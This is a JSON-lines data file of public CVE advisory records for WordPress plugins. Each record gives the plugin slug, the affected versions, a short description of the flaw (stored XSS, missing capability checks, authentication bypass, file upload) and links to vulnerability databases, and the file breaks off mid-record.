{"CVE_ID":"CVE-2023-1129","slug":"wp-fevents-book","versionImpact":"0.46","description":"The WP FEvents Book WordPress plugin through 0.46 does not ensures that bookings to be updated belong to the user making the request, allowing any authenticated user to book, add notes, or cancel booking on behalf of other users.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40479de-fb04-41b8-9fb0-41b9eefbd8af\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d40479de-fb04-41b8-9fb0-41b9eefbd8af\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4388","slug":"opal-estate","versionImpact":"1.6.11","description":"The Opal Estate plugin for WordPress is vulnerable to featured property modifications in versions up to, and including, 1.6.11. This is due to missing  capability checks on the opalestate_set_feature_property() and opalestate_remove_feature_property() functions. This makes it possible for unauthenticated attackers to set and remove featured properties.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/opal-estate\\\/trunk\\\/inc\\\/ajax-functions.php#L177\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ce729a2-a106-45ab-b96c-cfe75246def7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ce729a2-a106-45ab-b96c-cfe75246def7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6391","slug":"oik","versionImpact":"4.10.3","description":"The oik plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's bw_button shortcode in all versions up to, and including, 4.10.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3dfa92a-57da-49ab-95f7-504fa99ed47f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d3dfa92a-57da-49ab-95f7-504fa99ed47f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oik\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/oik\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oik\\\/trunk\\\/shortcodes\\\/oik-button.php#L34\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/oik\\\/trunk\\\/shortcodes\\\/oik-button.php#L34\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112763\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3112763\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4410","slug":"ignitiondeck","versionImpact":"1.9.8","description":"The IgnitionDeck Crowdfunding Platform plugin for WordPress is vulnerable to Missing Authorization in versions up to, and including, 1.9.8. This is due to missing capability checks on various functions called via AJAX actions in the ~\/classes\/class-idf-wizard.php file. This makes it possible for authenticated attackers, with subscriber access or higher, to execute various AJAX actions. This includes actions to change the permalink structure, plugin settings and others.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b6aad4-fbaf-4c0c-b2b7-6e264a1afb9b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/07b6aad4-fbaf-4c0c-b2b7-6e264a1afb9b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L1162\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ignitiondeck\\\/trunk\\\/classes\\\/class-idf-wizard.php#L1162\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8267","slug":"radio-player","versionImpact":"2.0.78","description":"The Radio Player \u2013 Live Shoutcast, Icecast and Any Audio Stream Player for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' attribute within the 'wp:radio-player' Gutenberg block in all versions up to, and including, 2.0.78 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49581614-14a8-4450-8f83-d8d22a3feee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/49581614-14a8-4450-8f83-d8d22a3feee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radio-player\\\/trunk\\\/block\\\/class-block.php#L26\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/radio-player\\\/trunk\\\/block\\\/class-block.php#L26\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radio-player\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/radio-player\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/radio-player\\\/trunk\\\/block\\\/class-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152379\\\/radio-player\\\/trunk\\\/block\\\/class-block.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9105","slug":"Ultimate_AI","versionImpact":"2.8.3","description":"The UltimateAI plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 2.8.3. This is due to insufficient verification on the user being supplied in the 'ultimate_ai_register_or_login_with_google' function. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2475643-a0b4-444a-a2c6-a5c45e90e1dd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2475643-a0b4-444a-a2c6-a5c45e90e1dd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/ultimateai-ai-enhanced-wordpress-plugin-with-saas-for-content-code-chat-and-image-generation\\\/51201953\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12110","slug":"gold-addons-for-elementor","versionImpact":"1.3.2","description":"The Gold Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the activate() and deactivate() functions in all versions up to, and including, 1.3.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate and deactivate licenses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gold-addons-for-elementor\\\/trunk\\\/includes\\\/admin\\\/class-ajax.php#L107\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/gold-addons-for-elementor\\\/trunk\\\/includes\\\/admin\\\/class-ajax.php#L107\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8e103afe-3ae7-413f-92b2-0e4dd9436f3e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12471","slug":"post-saint","versionImpact":"1.3.1","description":"The Post Saint: ChatGPT, GPT4, DALL-E, Stable Diffusion, Pexels, Dezgo AI Text & Image Generator plugin for WordPress is vulnerable to arbitrary files uploads due to a missing capability check and file type validation on the add_image_to_library AJAX action function in all versions up to, and including, 1.3.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to upload arbitrary files that make remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-saint\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/post-saint\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc17284e-65ea-4e67-aba9-3475f0174657?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bc17284e-65ea-4e67-aba9-3475f0174657?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13564","slug":"rife-elementor-extensions","versionImpact":"1.2.5","description":"The Rife Elementor Extensions & Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Writing Effect Headline shortcode in all versions up to, and including, 1.2.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244081\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244081\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/rife-elementor-extensions\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520555b4-35e8-4ec1-85b8-3a43b5209661?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/520555b4-35e8-4ec1-85b8-3a43b5209661?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13615","slug":"socialsnap","versionImpact":"1.3.6","description":"The Social Share Buttons, Social Sharing Icons, Click to Tweet \u2014 Social Media Plugin by Social Snap WordPress plugin through 1.3.6 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e8401973-f4c2-4ccf-a6ad-507dde8d2259\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11718","slug":"tarteaucitron-wp","versionImpact":"0.2.5","description":"The tarteaucitron-wp WordPress plugin before 0.3.0 allows author level and above users to add HTML into a post\/page, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02da3a49-20e4-4476-a78d-4c627994a90a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/02da3a49-20e4-4476-a78d-4c627994a90a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-46500","slug":"wp-auto-spinner","versionImpact":"3.25.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ValvePress Wordpress Auto Spinner allows Reflected XSS. This issue affects Wordpress Auto Spinner: from n\/a through 3.25.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-plugin-3-25-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-auto-spinner\\\/vulnerability\\\/wordpress-wordpress-auto-spinner-plugin-3-25-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7651","slug":"earnware-connect","versionImpact":"1.0.73","description":"The Earnware Connect plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ew_hasrole' shortcode in all versions up to, and including, 1.0.73 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/earnware-connect\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/earnware-connect\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515557bf-da71-4076-89bb-ce970ea7befa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/515557bf-da71-4076-89bb-ce970ea7befa?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4576","slug":"easy-bootstrap-shortcodes","versionImpact":"4.5.4","description":"The Easy Bootstrap Shortcode WordPress plugin through 4.5.4 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d679e0e-891b-44f1-ac7f-a766e12956e0\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d679e0e-891b-44f1-ac7f-a766e12956e0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0168","slug":"olevmedia-shortcodes","versionImpact":"1.1.9","description":"The Olevmedia Shortcodes WordPress plugin through 1.1.9 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e854efee-16fc-4379-9e66-d2883e01fb32\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e854efee-16fc-4379-9e66-d2883e01fb32\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1126","slug":"wp-fevents-book","versionImpact":"0.46","description":"The WP FEvents Book WordPress plugin through 0.46 does not sanitise and escape some parameters, which could allow any authenticated users, such as subscriber to perform Cross-Site Scripting attacks","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/87ce3c59-b234-47bf-abca-e690b53bbe82\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/87ce3c59-b234-47bf-abca-e690b53bbe82\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-4344","slug":"nmedia-user-file-uploader","versionImpact":"18.2","description":"The Frontend File Manager plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 18.2. This is due to lacking mishandling the use of user IDs that is accessible by the visitor. This makes it possible for unauthenticated or authenticated attackers to access the information and privileges of other users, including 'guest users', in their own category (authenticated, or unauthenticated guests).","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a7b2c9-5d8d-4b49-a47c-473e3288b563?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/28a7b2c9-5d8d-4b49-a47c-473e3288b563?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-frontend-file-manager-plugin-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4160","slug":"woo-pdf-invoice-builder","versionImpact":"1.2.90","description":"The WooCommerce PDF Invoice Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in versions up to, and including, 1.2.90 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L654\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woo-pdf-invoice-builder\\\/trunk\\\/woocommerce-pdf-invoice-ajax.php?rev=2935371#L654\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2953379%40woo-pdf-invoice-builder%2Ftrunk&old=2951617%40woo-pdf-invoice-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2953379%40woo-pdf-invoice-builder%2Ftrunk&old=2951617%40woo-pdf-invoice-builder%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a765360-8603-4ba1-a6db-dd0175ff3ddf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6a765360-8603-4ba1-a6db-dd0175ff3ddf?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5665","slug":"payment-forms-for-paystack","versionImpact":"3.4.1","description":"The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98f80608-f24f-4019-a757-de71cba9902f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/98f80608-f24f-4019-a757-de71cba9902f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L958\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L958\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L986\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L986\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1013\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1013\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1054\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1054\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1128\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1128\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1164\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1164\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1194\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/payment-forms-for-paystack\\\/tags\\\/3.4.1\\\/public\\\/class-paystack-forms-public-for-old-themes.php#L1194\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3756","slug":"mf-gig-calendar","versionImpact":"1.2.1","description":"The MF Gig Calendar WordPress plugin through 1.2.1 does not have CSRF checks in some places, which could allow attackers to make logged in Contributors and above delete arbitrary events via a CSRF attack","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28d0dca-2df1-4925-be81-dd9c46859c38\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b28d0dca-2df1-4925-be81-dd9c46859c38\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1804","slug":"tutor-lms-migration-tool","versionImpact":"2.2.0","description":"The Tutor LMS \u2013 Migration Tool plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the tutor_import_from_xml function in all versions up to, and including, 2.2.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to import courses.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a49a22e-d54e-461d-83c2-8278494eac13?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0a49a22e-d54e-461d-83c2-8278494eac13?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L579\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tutor-lms-migration-tool\\\/trunk\\\/classes\\\/LPtoTutorMigration.php#L579\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8103","slug":"wp-category-dropdown","versionImpact":"1.8","description":"The WP Category Dropdown plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'align' parameter in all versions up to, and including, 1.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c959f9c-8ac4-4f59-9d93-8f96e650b02d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7c959f9c-8ac4-4f59-9d93-8f96e650b02d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/category_dropdown_block.php#L8\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/category_dropdown_block.php#L8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-category-dropdown\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-category-dropdown\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/build\\\/index.js#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/build\\\/index.js#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/index.js#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/index.js#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/edit.js#L258\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-category-dropdown\\\/trunk\\\/src\\\/edit.js#L258\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9104","slug":"Ultimate_AI","versionImpact":"2.8.3","description":"The UltimateAI plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 2.8.3. This is due to the improper empty value check and a missing default activated value check in the 'ultimate_ai_change_pass' function. This makes it possible for unauthenticated attackers to reset the password of the first user, whose account is not yet activated or the first user who activated their account, who are subscribers.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a 